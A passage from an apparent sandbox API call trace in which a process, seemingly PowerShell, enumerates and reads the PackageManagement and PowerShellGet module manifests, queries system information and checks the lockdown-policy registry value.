nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0087.728] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb58) returned 1 [0087.728] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebee0c) returned 1 [0087.728] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0087.728] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x3d, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0087.728] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\*", lpFindFileData=0x4ebebbc | out: lpFindFileData=0x4ebebbc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24e89600, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24e89600, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24e89600, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x34d3c0 [0087.729] FindNextFileW (in: hFindFile=0x34d3c0, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24e89600, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24e89600, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24e89600, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0087.729] FindNextFileW (in: hFindFile=0x34d3c0, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24e89600, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24efba20, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24efba20, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0087.730] FindNextFileW (in: hFindFile=0x34d3c0, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0087.730] FindClose (in: hFindFile=0x34d3c0 | out: hFindFile=0x34d3c0) returned 1 [0087.730] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb7c) returned 1 [0087.730] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeddc) returned 1 [0087.730] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5c [0087.730] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x5c, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0087.730] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb60) returned 1 [0087.730] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee24 | out: lpFileInformation=0x4ebee24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24ed58c0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x1c7f8280, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x1c7f8280, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x8f9)) returned 1 [0087.731] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb5c) returned 1 [0087.874] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5c [0087.874] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x5c, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0087.874] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5c [0087.874] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x5c, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0087.875] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb84) returned 1 [0087.875] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0x6b865d0 | out: lpFileInformation=0x6b865d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24ed58c0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x1c7f8280, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x1c7f8280, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x8f9)) returned 1 [0087.875] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb80) returned 1 [0087.880] GetEnvironmentVariableW (in: lpName="PSModuleAnalysisCachePath", lpBuffer=0x4ebde48, nSize=0xbc | out: lpBuffer="") returned 0x0 [0087.881] CoTaskMemAlloc (cb=0x20c) returned 0x3173f0 [0087.881] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x3173f0 | out: pszPath="C:\\Users\\5AlR3U30D3\\AppData\\Local") returned 0x0 [0087.881] CoTaskMemFree (pv=0x3173f0) [0087.881] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x22 [0087.881] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local", nBufferLength=0x22, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\AppData\\Local", lpFilePart=0x0) returned 0x21 [0087.881] GetFileAttributesW (lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows\\powershell\\moduleanalysiscache")) returned 0xffffffff [0087.903] GetFileAttributesW (lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows\\powershell\\moduleanalysiscache")) returned 0xffffffff [0087.934] GetFileAttributesW (lpFileName="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows\\powershell\\moduleanalysiscache")) returned 0xffffffff [0087.972] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5c [0087.972] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x5c, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0087.972] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebecec) returned 1 [0087.972] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x468 [0087.973] GetFileType (hFile=0x468) returned 0x1 [0087.973] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebece8) returned 1 [0087.973] GetFileType (hFile=0x468) returned 0x1 [0087.973] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebed28*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebed28*=0) returned 0x0 [0087.973] ReadFile (in: hFile=0x468, lpBuffer=0x6b88874, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebed54, lpOverlapped=0x0 | out: lpBuffer=0x6b88874*, lpNumberOfBytesRead=0x4ebed54*=0x8f9, lpOverlapped=0x0) returned 1 [0087.975] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebed28*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebed28*=0) returned 0x8f9 [0087.975] ReadFile (in: hFile=0x468, lpBuffer=0x6b87d0d, nNumberOfBytesToRead=0x307, lpNumberOfBytesRead=0x4ebed54, lpOverlapped=0x0 | out: lpBuffer=0x6b87d0d*, lpNumberOfBytesRead=0x4ebed54*=0x0, lpOverlapped=0x0) returned 1 [0087.975] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebed28*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebed28*=0) returned 0x8f9 [0087.975] ReadFile (in: hFile=0x468, lpBuffer=0x6b88874, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebed54, lpOverlapped=0x0 | out: lpBuffer=0x6b88874*, lpNumberOfBytesRead=0x4ebed54*=0x0, lpOverlapped=0x0) returned 1 [0087.976] CloseHandle (hObject=0x468) returned 1 [0087.999] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psd1")) returned 0xffffffff [0087.999] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psm1")) returned 0xffffffff [0087.999] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.cdxml")) returned 0xffffffff [0087.999] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.xaml")) returned 0xffffffff [0088.000] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.ni.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.ni.dll")) returned 0xffffffff [0088.001] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.dll")) returned 0xffffffff [0088.001] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebee0c) returned 1 [0088.001] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x39 [0088.001] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x39, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0088.001] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\*", lpFindFileData=0x4ebebbc | out: lpFindFileData=0x4ebebbc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24e3d340, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24e3d340, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24e3d340, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x34d3c0 [0088.001] FindNextFileW (in: hFindFile=0x34d3c0, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24e3d340, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24e3d340, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24e3d340, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.001] FindNextFileW (in: hFindFile=0x34d3c0, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24e3d340, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24e634a0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24e634a0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0088.001] FindNextFileW (in: hFindFile=0x34d3c0, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0088.001] FindClose (in: hFindFile=0x34d3c0 | out: hFindFile=0x34d3c0) returned 1 [0088.002] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb7c) returned 1 [0088.002] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeddc) returned 1 [0088.002] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0088.002] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x54, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0088.002] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb60) returned 1 [0088.002] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee24 | out: lpFileInformation=0x4ebee24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24e3d340, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x1c7d2120, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x1c7d2120, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x10de)) returned 1 [0088.002] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb5c) returned 1 [0088.002] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0088.002] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x54, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0088.002] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0088.002] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x54, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0088.003] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb84) returned 1 [0088.003] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x6b96a10 | out: lpFileInformation=0x6b96a10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24e3d340, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x1c7d2120, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x1c7d2120, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x10de)) returned 1 [0088.003] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb80) returned 1 [0088.003] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0088.003] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x54, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0088.003] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebecec) returned 1 [0088.003] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4c4 [0088.003] GetFileType (hFile=0x4c4) returned 0x1 [0088.004] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebece8) returned 1 [0088.004] GetFileType (hFile=0x4c4) returned 0x1 [0088.004] SetFilePointer (in: hFile=0x4c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebed28*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebed28*=0) returned 0x0 [0088.004] ReadFile (in: hFile=0x4c4, lpBuffer=0x6b977e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebed54, lpOverlapped=0x0 | out: lpBuffer=0x6b977e8*, lpNumberOfBytesRead=0x4ebed54*=0x1000, lpOverlapped=0x0) returned 1 [0088.007] SetFilePointer (in: hFile=0x4c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebed28*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebed28*=0) returned 0x1000 [0088.007] ReadFile (in: hFile=0x4c4, lpBuffer=0x6b977e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebed54, lpOverlapped=0x0 | out: lpBuffer=0x6b977e8*, lpNumberOfBytesRead=0x4ebed54*=0xde, lpOverlapped=0x0) returned 1 [0088.007] SetFilePointer (in: hFile=0x4c4, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebed28*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebed28*=0) returned 0x10de [0088.007] ReadFile (in: hFile=0x4c4, lpBuffer=0x6b977e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebed54, lpOverlapped=0x0 | out: lpBuffer=0x6b977e8*, lpNumberOfBytesRead=0x4ebed54*=0x0, lpOverlapped=0x0) returned 1 [0088.007] CloseHandle (hObject=0x4c4) returned 1 [0088.011] CoCreateGuid (in: pguid=0x4ebed94 | out: pguid=0x4ebed94*(Data1=0xe9f6eb77, Data2=0x23be, Data3=0x4464, Data4=([0]=0x94, [1]=0x9e, [2]=0x17, [3]=0x28, [4]=0x65, [5]=0xf7, [6]=0xd4, [7]=0x7c))) returned 0x0 [0088.019] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x4c4 [0088.019] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x4c8 [0088.020] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x4cc [0088.020] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x4d0 [0088.020] SetEvent (hEvent=0x4d0) returned 1 [0088.020] SetEvent (hEvent=0x4c4) returned 1 [0088.020] SetEvent (hEvent=0x4c8) returned 1 [0088.020] SetEvent (hEvent=0x4cc) returned 1 [0088.021] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x4d4 [0088.021] SetThreadUILanguage (LangId=0x0) returned 0x409 [0088.070] EtwEventActivityIdControl () returned 0x0 [0088.070] EtwEventActivityIdControl () returned 0x0 [0088.070] EtwEventActivityIdControl () returned 0x0 [0088.160] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1")) returned 0x20 [0088.160] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0088.160] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x54, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0088.160] NtQuerySystemInformation (in: SystemInformationClass=0xa4, SystemInformation=0x4ebe6cc, Length=0x20, ResultLength=0x4ebe73c | out: SystemInformation=0x4ebe6cc, ResultLength=0x4ebe73c*=0x0) returned 0xc0000003 [0088.161] GetSystemInfo (in: lpSystemInfo=0x4ebe748 | out: lpSystemInfo=0x4ebe748*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0088.161] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ebe6d8 | out: phkResult=0x4ebe6d8*=0x468) returned 0x0 [0088.161] RegQueryValueExW (in: hKey=0x468, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x4ebe6f4, lpData=0x0, lpcbData=0x4ebe6f0*=0x0 | out: lpType=0x4ebe6f4*=0x0, lpData=0x0, lpcbData=0x4ebe6f0*=0x0) returned 0x2 [0088.161] RegCloseKey (hKey=0x468) returned 0x0 [0088.168] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0088.168] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x54, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0088.168] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe650) returned 1 [0088.168] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x468 [0088.169] GetFileType (hFile=0x468) returned 0x1 [0088.169] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe64c) returned 1 [0088.169] GetFileType (hFile=0x468) returned 0x1 [0088.169] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebe68c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebe68c*=0) returned 0x0 [0088.169] ReadFile (in: hFile=0x468, lpBuffer=0x6bbb418, 